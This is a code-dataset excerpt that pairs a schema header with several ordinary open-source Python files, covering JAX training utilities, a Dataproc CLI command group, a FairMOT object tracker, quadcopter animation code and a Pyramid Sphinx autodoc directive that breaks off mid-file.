hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a1599c7d689bdb23980abc965d7263008352328
| 3,443
|
py
|
Python
|
nfnets/utils.py
|
bruinxiong/deepmind-research
|
4899440e3eb2dee9335c469c7f01aadcbf21cc72
|
[
"Apache-2.0"
] | 1
|
2021-02-15T04:50:04.000Z
|
2021-02-15T04:50:04.000Z
|
nfnets/utils.py
|
bruinxiong/deepmind-research
|
4899440e3eb2dee9335c469c7f01aadcbf21cc72
|
[
"Apache-2.0"
] | null | null | null |
nfnets/utils.py
|
bruinxiong/deepmind-research
|
4899440e3eb2dee9335c469c7f01aadcbf21cc72
|
[
"Apache-2.0"
] | 1
|
2021-05-20T15:43:47.000Z
|
2021-05-20T15:43:47.000Z
|
# Copyright 2020 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utils."""
import jax
import jax.numpy as jnp
import tree
def reduce_fn(x, mode):
"""Reduce fn for various losses."""
if mode == 'none' or mode is None:
return jnp.asarray(x)
elif mode == 'sum':
return jnp.sum(x)
elif mode == 'mean':
return jnp.mean(x)
else:
raise ValueError('Unsupported reduction option.')
def softmax_cross_entropy(logits, labels, reduction='sum'):
"""Computes softmax cross entropy given logits and one-hot class labels.
Args:
logits: Logit output values.
labels: Ground truth one-hot-encoded labels.
reduction: Type of reduction to apply to loss.
Returns:
Loss value. If `reduction` is `none`, this has the same shape as `labels`;
otherwise, it is scalar.
Raises:
ValueError: If the type of `reduction` is unsupported.
"""
loss = -jnp.sum(labels * jax.nn.log_softmax(logits), axis=-1)
return reduce_fn(loss, reduction)
def topk_correct(logits, labels, mask=None, prefix='', topk=(1, 5)):
"""Calculate top-k error for multiple k values."""
metrics = {}
argsorted_logits = jnp.argsort(logits)
for k in topk:
pred_labels = argsorted_logits[..., -k:]
# Get the number of examples where the label is in the top-k predictions
correct = any_in(pred_labels, labels).any(axis=-1).astype(jnp.float32)
if mask is not None:
correct *= mask
metrics[f'{prefix}top_{k}_acc'] = correct
return metrics
@jax.vmap
def any_in(prediction, target):
"""For each row in a and b, checks if any element of a is in b."""
return jnp.isin(prediction, target)
def tf1_ema(ema_value, current_value, decay, step):
"""Implements EMA with TF1-style decay warmup."""
decay = jnp.minimum(decay, (1.0 + step) / (10.0 + step))
return ema_value * decay + current_value * (1 - decay)
def ema(ema_value, current_value, decay, step):
"""Implements EMA without any warmup."""
del step
return ema_value * decay + current_value * (1 - decay)
to_bf16 = lambda x: x.astype(jnp.bfloat16) if x.dtype == jnp.float32 else x
from_bf16 = lambda x: x.astype(jnp.float32) if x.dtype == jnp.bfloat16 else x
def _replicate(x, devices=None):
"""Replicate an object on each device."""
x = jax.numpy.array(x)
if devices is None:
devices = jax.local_devices()
return jax.api.device_put_sharded(len(devices) * [x], devices)
def broadcast(obj):
"""Broadcasts an object to all devices."""
if obj is not None and not isinstance(obj, bool):
return _replicate(obj)
else:
return obj
def split_tree(tuple_tree, base_tree, n):
"""Splits tuple_tree with n-tuple leaves into n trees."""
return [tree.map_structure_up_to(base_tree, lambda x: x[i], tuple_tree) # pylint: disable=cell-var-from-loop
for i in range(n)]
| 31.87963
| 111
| 0.683706
|
4a1599c9df8991429c3206b0cb723f6a2d475331
| 1,171
|
py
|
Python
|
google-cloud-sdk/lib/surface/dataproc/operations/__init__.py
|
bopopescu/searchparty
|
afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6
|
[
"Apache-2.0"
] | 1
|
2017-11-29T18:52:27.000Z
|
2017-11-29T18:52:27.000Z
|
google-cloud-sdk/lib/surface/dataproc/operations/__init__.py
|
bopopescu/searchparty
|
afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6
|
[
"Apache-2.0"
] | null | null | null |
google-cloud-sdk/lib/surface/dataproc/operations/__init__.py
|
bopopescu/searchparty
|
afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6
|
[
"Apache-2.0"
] | 3
|
2017-07-27T18:44:13.000Z
|
2020-07-25T17:48:53.000Z
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The command group for cloud dataproc operations."""
from googlecloudsdk.calliope import base
class Operations(base.Group):
"""View and manage Google Cloud Dataproc operations.
View and manage Google Cloud Dataproc operations.
## EXAMPLES
To cancel an active operation, run:
$ {command} cancel operation_id
To view the details of an operation, run:
$ {command} describe operation_id
To see the list of all operations, run:
$ {command} list
To delete the record of an inactive operation, run:
$ {command} delete operation_id
"""
| 27.232558
| 74
| 0.740393
|
4a1599da7bd38d6aeab01b9d322691d80b5c212a
| 17,674
|
py
|
Python
|
Software/MOTsc/TrackingKernel/tracker.py
|
liu-mengyang/MOTinAR
|
209412346841f2ac69b0e38a3502c9c728309752
|
[
"MIT"
] | 3
|
2021-09-19T13:49:46.000Z
|
2021-12-13T12:41:29.000Z
|
Software/MOTsc/TrackingKernel/tracker.py
|
liu-mengyang/MOTinAR
|
209412346841f2ac69b0e38a3502c9c728309752
|
[
"MIT"
] | null | null | null |
Software/MOTsc/TrackingKernel/tracker.py
|
liu-mengyang/MOTinAR
|
209412346841f2ac69b0e38a3502c9c728309752
|
[
"MIT"
] | null | null | null |
import numpy as np
from numba import jit
from collections import deque
import itertools
import os
import os.path as osp
import time
import torch
import cv2
import csv
import torch.nn.functional as F
import ctypes
from .build_model import build_fairmot, load_model
from .fairmot.models.decode import mot_decode
from .fairmot.models.utils import _tranpose_and_gather_feat
from .fairmot.tracking_utils.utils import *
from .fairmot.tracking_utils.log import logger
from .fairmot.tracking_utils.kalman_filter import KalmanFilter
from .fairmot.tracker import matching
from .fairmot.tracker.basetrack import BaseTrack, TrackState
from .fairmot.utils.post_process import ctdet_post_process
from .fairmot.utils.image import get_affine_transform
class STrack(BaseTrack):
shared_kalman = KalmanFilter()
def __init__(self, tlwh, score, temp_feat, buffer_size=30):
# wait activate
self._tlwh = np.asarray(tlwh, dtype=np.float)
self.kalman_filter = None
self.mean, self.covariance = None, None
self.is_activated = False
self.score = score
self.tracklet_len = 0
self.smooth_feat = None
self.update_features(temp_feat)
self.features = deque([], maxlen=buffer_size)
self.alpha = 0.9
def update_features(self, feat):
feat /= np.linalg.norm(feat)
self.curr_feat = feat
if self.smooth_feat is None:
self.smooth_feat = feat
else:
self.smooth_feat = self.alpha * self.smooth_feat + (1 - self.alpha) * feat
self.features.append(feat)
self.smooth_feat /= np.linalg.norm(self.smooth_feat)
def predict(self):
mean_state = self.mean.copy()
if self.state != TrackState.Tracked:
mean_state[7] = 0
self.mean, self.covariance = self.kalman_filter.predict(mean_state, self.covariance)
@staticmethod
def multi_predict(stracks):
if len(stracks) > 0:
multi_mean = np.asarray([st.mean.copy() for st in stracks])
multi_covariance = np.asarray([st.covariance for st in stracks])
for i, st in enumerate(stracks):
if st.state != TrackState.Tracked:
multi_mean[i][7] = 0
multi_mean, multi_covariance = STrack.shared_kalman.multi_predict(multi_mean, multi_covariance)
for i, (mean, cov) in enumerate(zip(multi_mean, multi_covariance)):
stracks[i].mean = mean
stracks[i].covariance = cov
def activate(self, kalman_filter, frame_id, next_id):
"""Start a new tracklet"""
self.kalman_filter = kalman_filter
self.track_id = next_id
self.mean, self.covariance = self.kalman_filter.initiate(self.tlwh_to_xyah(self._tlwh))
self.tracklet_len = 0
self.state = TrackState.Tracked
if frame_id == 1:
self.is_activated = True
self.frame_id = frame_id
self.start_frame = frame_id
def re_activate(self, new_track, frame_id):
self.mean, self.covariance = self.kalman_filter.update(
self.mean, self.covariance, self.tlwh_to_xyah(new_track.tlwh)
)
self.update_features(new_track.curr_feat)
self.tracklet_len = 0
self.state = TrackState.Tracked
self.is_activated = True
self.frame_id = frame_id
def update(self, new_track, frame_id, update_feature=True):
"""
Update a matched track
:type new_track: STrack
:type frame_id: int
:type update_feature: bool
:return:
"""
self.frame_id = frame_id
self.tracklet_len += 1
new_tlwh = new_track.tlwh
self.mean, self.covariance = self.kalman_filter.update(
self.mean, self.covariance, self.tlwh_to_xyah(new_tlwh))
self.state = TrackState.Tracked
self.is_activated = True
self.score = new_track.score
if update_feature:
self.update_features(new_track.curr_feat)
@property
# @jit(nopython=True)
def tlwh(self):
"""Get current position in bounding box format `(top left x, top left y,
width, height)`.
"""
if self.mean is None:
return self._tlwh.copy()
ret = self.mean[:4].copy()
ret[2] *= ret[3]
ret[:2] -= ret[2:] / 2
return ret
@property
# @jit(nopython=True)
def tlbr(self):
"""Convert bounding box to format `(min x, min y, max x, max y)`, i.e.,
`(top left, bottom right)`.
"""
ret = self.tlwh.copy()
ret[2:] += ret[:2]
return ret
@staticmethod
# @jit(nopython=True)
def tlwh_to_xyah(tlwh):
"""Convert bounding box to format `(center x, center y, aspect ratio,
height)`, where the aspect ratio is `width / height`.
"""
ret = np.asarray(tlwh).copy()
ret[:2] += ret[2:] / 2
ret[2] /= ret[3]
return ret
def to_xyah(self):
return self.tlwh_to_xyah(self.tlwh)
@staticmethod
# @jit(nopython=True)
def tlbr_to_tlwh(tlbr):
ret = np.asarray(tlbr).copy()
ret[2:] -= ret[:2]
return ret
@staticmethod
# @jit(nopython=True)
def tlwh_to_tlbr(tlwh):
ret = np.asarray(tlwh).copy()
ret[2:] += ret[:2]
return ret
def __repr__(self):
return 'OT_{}_({}-{})'.format(self.track_id, self.start_frame, self.end_frame)
class FairTracker(object):
def __init__(self, opt, frame_rate=30):
self.opt = opt
if opt.gpus[0] >= 0:
opt.device = torch.device('cuda')
else:
opt.device = torch.device('cpu')
print('Creating model...')
self.model = build_fairmot()
self.model = load_model(self.model, opt.load_model)
self.model = self.model.to(opt.device)
self.model.eval()
self.tracked_stracks = [] # type: list[STrack]
self.lost_stracks = [] # type: list[STrack]
self.removed_stracks = [] # type: list[STrack]
self.frame_id = 0
self.next_id = 1
self.det_thresh = opt.conf_thres
self.buffer_size = int(frame_rate / 30.0 * opt.track_buffer)
self.max_time_lost = self.buffer_size
self.max_per_image = opt.K
self.mean = np.array(opt.mean, dtype=np.float32).reshape(1, 1, 3)
self.std = np.array(opt.std, dtype=np.float32).reshape(1, 1, 3)
self.kalman_filter = KalmanFilter()
self.pret_lst = [] # Load Input Time per frame
self.infert_lst = [] # Model Infer Time per frame
self.trkt_lst = [] # Update Track per frame
self.detsnum_lst = [] # Detection Number per frame
self.trknum_lst = [] # Tracking Number per frame
def post_process(self, dets, meta):
dets = dets.detach().cpu().numpy()
dets = dets.reshape(1, -1, dets.shape[2])
dets = ctdet_post_process(
dets.copy(), [meta['c']], [meta['s']],
meta['out_height'], meta['out_width'], self.opt.num_classes)
for j in range(1, self.opt.num_classes + 1):
dets[0][j] = np.array(dets[0][j], dtype=np.float32).reshape(-1, 5)
return dets[0]
def merge_outputs(self, detections):
results = {}
for j in range(1, self.opt.num_classes + 1):
results[j] = np.concatenate(
[detection[j] for detection in detections], axis=0).astype(np.float32)
scores = np.hstack(
[results[j][:, 4] for j in range(1, self.opt.num_classes + 1)])
if len(scores) > self.max_per_image:
kth = len(scores) - self.max_per_image
thresh = np.partition(scores, kth)[kth]
for j in range(1, self.opt.num_classes + 1):
keep_inds = (results[j][:, 4] >= thresh)
results[j] = results[j][keep_inds]
return results
def find_trk(self, trk_id):
for t,trk in enumerate(self.tracked_stracks):
if trk.track_id == trk_id:
return t, trk
return None, None
def update(self, im_blob, image_size, dense_region0=None):
#### ********* ####
self.frame_id += 1
activated_starcks = []
refind_stracks = []
lost_stracks = []
removed_stracks = []
height = image_size[0]
width = image_size[1]
inp_height = 608
inp_width = 1088
c = np.array([width / 2., height / 2.], dtype=np.float32)
s = max(float(inp_width) / float(inp_height) * height, width) * 1.0
meta = {'c': c, 's': s,
'out_height': inp_height // self.opt.down_ratio,
'out_width': inp_width // self.opt.down_ratio}
infer_st = time.time()
''' Step 1: Network forward, get detections & embeddings'''
with torch.no_grad():
output = self.model(im_blob)[-1]
hm = output['hm'].sigmoid_()
wh = output['wh']
id_feature = output['id']
id_feature = F.normalize(id_feature, dim=1)
reg = output['reg'] if self.opt.reg_offset else None
dets, inds = mot_decode(hm, wh, reg=reg, ltrb=self.opt.ltrb, K=self.opt.K)
id_feature = _tranpose_and_gather_feat(id_feature, inds)
id_feature = id_feature.squeeze(0)
id_feature = id_feature.cpu().numpy()
infer_et = time.time()
self.infert_lst.append(infer_et-infer_st)
trk_st = time.time()
dets = self.post_process(dets, meta)
dets = self.merge_outputs([dets])[1]
remain_inds = dets[:, 4] > self.opt.conf_thres
dets = dets[remain_inds]
id_feature = id_feature[remain_inds]
self.detsnum_lst.append(len(dets))
if dense_region0 is not None:
for det in dets:
det[0] += dense_region0[0]
det[1] += dense_region0[1]
det[2] += dense_region0[0]
det[3] += dense_region0[1]
if len(dets) > 0:
'''Detections'''
detections = [STrack(STrack.tlbr_to_tlwh(tlbrs[:4]), tlbrs[4], f, 30) for
(tlbrs, f) in zip(dets[:, :5], id_feature)]
else:
detections = []
''' Add newly detected tracklets to tracked_stracks'''
self.trknum_lst.append(len(self.tracked_stracks) + len(self.lost_stracks))
unconfirmed = []
tracked_stracks = [] # type: list[STrack]
for track in self.tracked_stracks:
if not track.is_activated:
unconfirmed.append(track)
else:
tracked_stracks.append(track)
''' Step 2: First association, with embedding'''
strack_pool = joint_stracks(tracked_stracks, self.lost_stracks)
# Predict the current location with KF
STrack.multi_predict(strack_pool)
dists = matching.embedding_distance(strack_pool, detections)
dists = matching.fuse_motion(self.kalman_filter, dists, strack_pool, detections)
matches, u_track, u_detection = matching.linear_assignment(dists, thresh=0.4)
for itracked, idet in matches:
track = strack_pool[itracked]
det = detections[idet]
if track.state == TrackState.Tracked:
track.update(detections[idet], self.frame_id)
activated_starcks.append(track)
else:
track.re_activate(det, self.frame_id)
refind_stracks.append(track)
''' Step 3: Second association, with IOU'''
detections = [detections[i] for i in u_detection]
r_tracked_stracks = [strack_pool[i] for i in u_track if strack_pool[i].state == TrackState.Tracked]
dists = matching.iou_distance(r_tracked_stracks, detections)
matches, u_track, u_detection = matching.linear_assignment(dists, thresh=0.5)
for itracked, idet in matches:
track = r_tracked_stracks[itracked]
det = detections[idet]
if track.state == TrackState.Tracked:
track.update(det, self.frame_id)
activated_starcks.append(track)
else:
track.re_activate(det, self.frame_id)
refind_stracks.append(track)
for it in u_track:
track = r_tracked_stracks[it]
if not track.state == TrackState.Lost:
track.mark_lost()
lost_stracks.append(track)
'''Deal with unconfirmed tracks, usually tracks with only one beginning frame'''
detections = [detections[i] for i in u_detection]
dists = matching.iou_distance(unconfirmed, detections)
matches, u_unconfirmed, u_detection = matching.linear_assignment(dists, thresh=0.7)
for itracked, idet in matches:
unconfirmed[itracked].update(detections[idet], self.frame_id)
activated_starcks.append(unconfirmed[itracked])
for it in u_unconfirmed:
track = unconfirmed[it]
track.mark_removed()
removed_stracks.append(track)
""" Step 4: Init new stracks"""
for inew in u_detection:
track = detections[inew]
if track.score < self.det_thresh:
continue
track.activate(self.kalman_filter, self.frame_id, self.next_id)
self.next_id += 1
activated_starcks.append(track)
""" Step 5: Update state"""
for track in self.lost_stracks:
if self.frame_id - track.end_frame > self.max_time_lost:
track.mark_removed()
removed_stracks.append(track)
self.tracked_stracks = [t for t in self.tracked_stracks if t.state == TrackState.Tracked]
self.tracked_stracks = joint_stracks(self.tracked_stracks, activated_starcks)
self.tracked_stracks = joint_stracks(self.tracked_stracks, refind_stracks)
self.lost_stracks = sub_stracks(self.lost_stracks, self.tracked_stracks)
self.lost_stracks.extend(lost_stracks)
self.lost_stracks = sub_stracks(self.lost_stracks, self.removed_stracks)
self.removed_stracks.extend(removed_stracks)
self.tracked_stracks, self.lost_stracks = remove_duplicate_stracks(self.tracked_stracks, self.lost_stracks)
# get scores of lost tracks
output_stracks = [track for track in self.tracked_stracks if track.is_activated]
trk_et = time.time()
self.trkt_lst.append(trk_et-trk_st)
return output_stracks
def infer(self, im_blob, image_size):
#### ********* ####
self.frame_id += 1
activated_starcks = []
refind_stracks = []
lost_stracks = []
removed_stracks = []
height = image_size[0]
width = image_size[1]
inp_height = 608
inp_width = 1088
c = np.array([width / 2., height / 2.], dtype=np.float32)
s = max(float(inp_width) / float(inp_height) * height, width) * 1.0
meta = {'c': c, 's': s,
'out_height': inp_height // self.opt.down_ratio,
'out_width': inp_width // self.opt.down_ratio}
infer_st = time.time()
''' Step 1: Network forward, get detections & embeddings'''
with torch.no_grad():
output = self.model(im_blob)[-1]
hm = output['hm'].sigmoid_()
wh = output['wh']
id_feature = output['id']
id_feature = F.normalize(id_feature, dim=1)
reg = output['reg'] if self.opt.reg_offset else None
dets, inds = mot_decode(hm, wh, reg=reg, ltrb=self.opt.ltrb, K=self.opt.K)
id_feature = _tranpose_and_gather_feat(id_feature, inds)
id_feature = id_feature.squeeze(0)
id_feature = id_feature.cpu().numpy()
infer_et = time.time()
self.infert_lst.append(infer_et-infer_st)
trk_st = time.time()
dets = self.post_process(dets, meta)
dets = self.merge_outputs([dets])[1]
remain_inds = dets[:, 4] > self.opt.conf_thres
dets = dets[remain_inds]
id_feature = id_feature[remain_inds]
self.detsnum_lst.append(len(dets))
if len(dets) > 0:
'''Detections'''
detections = [STrack(STrack.tlbr_to_tlwh(tlbrs[:4]), tlbrs[4], f, 30) for
(tlbrs, f) in zip(dets[:, :5], id_feature)]
else:
detections = []
return detections
def joint_stracks(tlista, tlistb):
exists = {}
res = []
for t in tlista:
exists[t.track_id] = 1
res.append(t)
for t in tlistb:
tid = t.track_id
if not exists.get(tid, 0):
exists[tid] = 1
res.append(t)
return res
def sub_stracks(tlista, tlistb):
stracks = {}
for t in tlista:
stracks[t.track_id] = t
for t in tlistb:
tid = t.track_id
if stracks.get(tid, 0):
del stracks[tid]
return list(stracks.values())
def remove_duplicate_stracks(stracksa, stracksb):
pdist = matching.iou_distance(stracksa, stracksb)
pairs = np.where(pdist < 0.15)
dupa, dupb = list(), list()
for p, q in zip(*pairs):
timep = stracksa[p].frame_id - stracksa[p].start_frame
timeq = stracksb[q].frame_id - stracksb[q].start_frame
if timep > timeq:
dupb.append(q)
else:
dupa.append(p)
resa = [t for i, t in enumerate(stracksa) if not i in dupa]
resb = [t for i, t in enumerate(stracksb) if not i in dupb]
return resa, resb
| 36.441237
| 115
| 0.59596
|
4a1599e6ba4dc1e64fcf7d970ba0ace1bfd128c6
| 7,027
|
py
|
Python
|
plotting.py
|
LiveActionCactus/quadcopter_simulation_python
|
f457835b4de4c418323dc8be1b21f52d05ef3e07
|
[
"MIT"
] | null | null | null |
plotting.py
|
LiveActionCactus/quadcopter_simulation_python
|
f457835b4de4c418323dc8be1b21f52d05ef3e07
|
[
"MIT"
] | null | null | null |
plotting.py
|
LiveActionCactus/quadcopter_simulation_python
|
f457835b4de4c418323dc8be1b21f52d05ef3e07
|
[
"MIT"
] | null | null | null |
# Creates and visual animation of quadcopter state information
#
# By: Patrick Ledzian
# Date: 18 Apr 2020
"""
Creates and plays an animation of a 13-state quadcopter simulation. Works along with the quadcopter class descriptor
found in quadcopter.py.
"""
# External Libraries
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import mpl_toolkits.mplot3d.axes3d as p3
import time
# Project Libraries
import quadcopter
# TODO: set the plotting sample rate in code, need to think about this a bit (falls in category with pos/att asynchronicity)
# TODO: maybe have this class inherit from Quadcopter() to get it's properties, is that necessary? Currently using Quadcopter() static methods
# TODO: do I need a quaternion class to encapsulate it's functionality? (maybe when I add the non-linear controller?) could have a bunch of static methods
# TODO: add pre-plotting of waypoints
# TODO: add trajectory ghost line to track in gray (see how close we get), have error metric plotting (maybe as part of analysis class?)
# TODO: allow the QuadPlot class to plot multiple vehicles at once
# TODO: link the plotting functionality to the Quacopter class in some way, better for multi-agent animations
# TODO: save animation to file, put on GitHub home
class QuadPlot:
"""
Class descriptor of a quadcopter animation object. Allows for animation of historical quadcopter state information.
"""
def __init__(self, sim_state_data):
"""
Class constructor
:param sim_state_data: 13xN array of state information (will become Qx13xN for multi-vehicle case)
"""
if str(np.shape(sim_state_data)[0]) == "13":
pass
elif str(np.shape(sim_state_data)[1]) == "13":
sim_state_data = np.transpose(sim_state_data)
else:
raise Exception("The dimensions of the input data is incorrect, check and try again")
sim_state_data = sim_state_data[:, ::8] # TODO: handle the downsampling in the main.py file, it's a simulation spec
# initialize the 3-D animation/plotting structure
fig = plt.figure()
ax = p3.Axes3D(fig)
data = np.array([[sim_state_data[0, :], sim_state_data[1, :], sim_state_data[2, :]]])
# declare line objects
ax.plot([], [], [], '-', c='darkred')[0] # quad arm
ax.plot([], [], [], '-', c='midnightblue')[0] # quad arm
ax.plot([], [], [], '-', c='darkgrey', marker='o', markersize=1, markevery=3)[0] # quad center
ax.plot([], [], [], '.', c='red', markersize=1)[0] # waypoints
ax.plot([], [], [], '.', c='gold', markersize=2)[0] # trailing line
ax.view_init(elev=30.0, azim=285)
ax.dist = 12.0
self._q1_pos_obj = [ax.plot(dat[0:1, 0], dat[0:1, 1], dat[0:1, 2])[0] for dat in data] # create quadcopter "lines" plotting objects
self.set_limits(1.0, 1.0, 3.0)
# save some information as properties for later use
self._fig = fig
self._pos_data = data
self._full_state = sim_state_data
def plot_quad_3d(self):
"""
Main plotting function, makes the FuncAnimation call that runs the animation using the update_quad() callback function.
:return:
"""
t = time.time()
ani = animation.FuncAnimation(self._fig, self.update_quad, np.shape(self._pos_data)[2],
fargs=(self._pos_data, self._q1_pos_obj),
interval=1, blit=False, repeat=False)
plt.show()
#
# Animation helper functions
#
def set_limits(self, x, y, z):
"""
Set initial figure boundaries in __init__(), labels the figure axes and title
:param x: (> 0) maximum x bound
:param y: (> 0) maximum y bound
:param z: (> 0) maximum z bound
:return: NONE, sets pre-existing figure properties
"""
ax = plt.gca()
ax.set_xlim3d([0.0, x]) # x
ax.set_ylim3d([0.0, y]) # y
ax.set_zlim3d([0.0, z]) # z
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Altitude')
ax.set_title('Quadcopter Simulation')
def plot_waypoints(self, wpts):
# TODO: pre-plot the points that the quadcopter is trying to maneuver over
pass
def update_quad(self, itr, pos_data, pos_obj):
"""
FuncAnimation() callback function that updates the lines in the the animation figure that was initialized in __init__()
:param itr: integer counter of the simulation step
:param pos_data: Qx3xN array of position data
:param pos_obj: [] array NOT IN USE, will be line object corresponding to each quadcopter
:return: NONE, sets pre-existing figure properties
"""
quad_pos_world = self.quad_pos_world(self._full_state[:, itr]) # position in world frame coordinates
ax = plt.gca()
lines = ax.get_lines() # 5 line objects per quadcopter [arm1, arm2, center of mass, waypoint, historical tail
lines_data = [quad_pos_world[:, [0, 2]], quad_pos_world[:, [1, 3]], quad_pos_world[:, [4, 5]]] # pairs data with correct line object
# plot world coordinates of quadcopter arms
for line_obj, line_data in zip(lines[0:3], lines_data):
x, y, z = line_data
line_obj.set_data(x, y)
line_obj.set_3d_properties(z)
# trailing line/history update
lines[4].set_data(pos_data[0, 0:2, :itr])
lines[4].set_3d_properties(pos_data[0, 2, :itr])
def quad_pos_world(self, state, L=0.046, H=0.05):
"""
Takes in quadcopter parameters and state information and returns the 3-D position in the world frame
:param state: 13x1 quadcopter state at a specific simulation iteration
:param L: length of quadcopter arm from center of mass in meters, assumes all arms are the same
:param H: height of the quadcoper in meters
:return: position of the vehicle in world frame
"""
pos = state[0:3]
q = state[6:10]
rot = quadcopter.Quadcopter.quat2rot(q) # express quaternion rotation as a rotation matrix, ZXY rotation type
# homogeneous transform from body to world frame
padding = np.array([0, 0, 0, 1]) # allows rigid body rotation about a point wrt SO(3) definition
wHb = np.concatenate((np.concatenate((rot, pos[:, None]), axis=1), padding[None, :]), axis=0)
body_frame = np.transpose(np.array([
[L, 0, 0, 1],
[0, L, 0, 1],
[-L, 0, 0, 1],
[0, -L, 0, 1],
[0, 0, 0, 1],
[0, 0, H, 1]
]))
world_frame = np.matmul(wHb, body_frame)
quad_pos_world = world_frame[0:3, :]
return quad_pos_world
| 44.194969
| 154
| 0.612637
|
4a159a2173099b23d5b06695e800eee68088490c
| 87
|
py
|
Python
|
pymatex/listener/__init__.py
|
Gawaboumga/PyMatex
|
3ccc0aa23211a064aa31a9b509b108cd606a4992
|
[
"MIT"
] | 1
|
2019-03-05T09:45:04.000Z
|
2019-03-05T09:45:04.000Z
|
pymatex/listener/__init__.py
|
Gawaboumga/PyMatex
|
3ccc0aa23211a064aa31a9b509b108cd606a4992
|
[
"MIT"
] | null | null | null |
pymatex/listener/__init__.py
|
Gawaboumga/PyMatex
|
3ccc0aa23211a064aa31a9b509b108cd606a4992
|
[
"MIT"
] | null | null | null |
from pymatex.listener.MatexAST import *
from pymatex.listener.MatexASTVisitor import *
| 29
| 46
| 0.83908
|
4a159b973ca74513c45d8ba32b02c0973c115e75
| 11,116
|
py
|
Python
|
pyramid_autodoc/__init__.py
|
mfaraji/pyramid_autodoc
|
2f527f886309a1266befec8551bd9eb1bba2b6fe
|
[
"MIT"
] | null | null | null |
pyramid_autodoc/__init__.py
|
mfaraji/pyramid_autodoc
|
2f527f886309a1266befec8551bd9eb1bba2b6fe
|
[
"MIT"
] | null | null | null |
pyramid_autodoc/__init__.py
|
mfaraji/pyramid_autodoc
|
2f527f886309a1266befec8551bd9eb1bba2b6fe
|
[
"MIT"
] | null | null | null |
"""
Sphinx extension that is able to convert pyramid routes to rst
"""
import sys
import docutils
from docutils import nodes
from docutils.parsers.rst import Directive, directives
from pyramid.compat import PY3
from pyramid.compat import string_types
from pyramid.config import Configurator
from pyramid.scripting import prepare
from pyramid_autodoc.utils import get_route_data, ANY_KEY
from sphinxcontrib.autohttp.common import http_directive
from sphinxcontrib import httpdomain
from docutils.statemachine import ViewList
from sphinx import addnodes
from sphinx.util.nodes import nested_parse_with_titles
from montague import load_app
import re
class RouteDirective(Directive):
""" Route directive.
Injects sections in the documentation about the routes registered in the
given module.
Usage, in a sphinx documentation::
.. pyramid-autodoc:: development.ini
:skip: ^/status
:match: ^/v1
"""
has_content = True
required_arguments = 1
option_spec = {
'match-path': directives.unchanged,
'match-module': directives.unchanged,
'skip-path': directives.unchanged,
'match-module': directives.unchanged,
'format': directives.unchanged,
'link-code': directives.flag,
'link-code-pattern': directives.unchanged,
}
def __init__(self, *args, **kwargs):
super(RouteDirective, self).__init__(*args, **kwargs)
self.env = self.state.document.settings.env
def matches_pattern(self, filters, value):
if filters is not None:
for path_filter in filters:
if re.match(path_filter, value):
return True
return False
def get_routes(self, config_file, path_blacklist=None, path_whitelist=None,
module_blacklist=None, module_whitelist=None):
app = load_app(config_file)
env = prepare()
registry = env['registry']
config = Configurator(registry=registry)
mapper = config.get_routes_mapper()
try: # only supported in pyramid 1.6
routes = mapper.get_routes(include_static=True)
except:
routes = mapper.get_routes()
mapped_routes = []
for route in routes:
route_data = get_route_data(route, registry)
for name, pattern, view, method, docs, src in route_data:
if path_blacklist:
if self.matches_pattern(path_blacklist, pattern):
continue
if path_whitelist:
if not self.matches_pattern(path_whitelist, pattern):
continue
if module_blacklist:
if self.matches_pattern(module_blacklist, view):
continue
if module_whitelist:
if not self.matches_pattern(module_whitelist, view):
continue
mapped_routes.append({
'name': name,
'pattern': pattern,
'view': view,
'method': method,
'docs': trim(docs),
'view_module': src.get('module_name'),
'view_callable': src.get('callable_name'),
'source_lines': src.get('source_lines'),
})
return mapped_routes
def make_httpdomain_rst(self, mapped_routes):
node = nodes.section()
node.document = self.state.document
result = ViewList()
routes = {}
for route in mapped_routes:
if route['method'] == ANY_KEY:
method = 'any'
else:
method = route['method']
directives = http_directive(
method,
route['pattern'],
route['docs'],
)
routes[(method, route['pattern'])] = route
for line in directives:
result.append(line, '<autopyramid>')
nested_parse_with_titles(self.state, result, node)
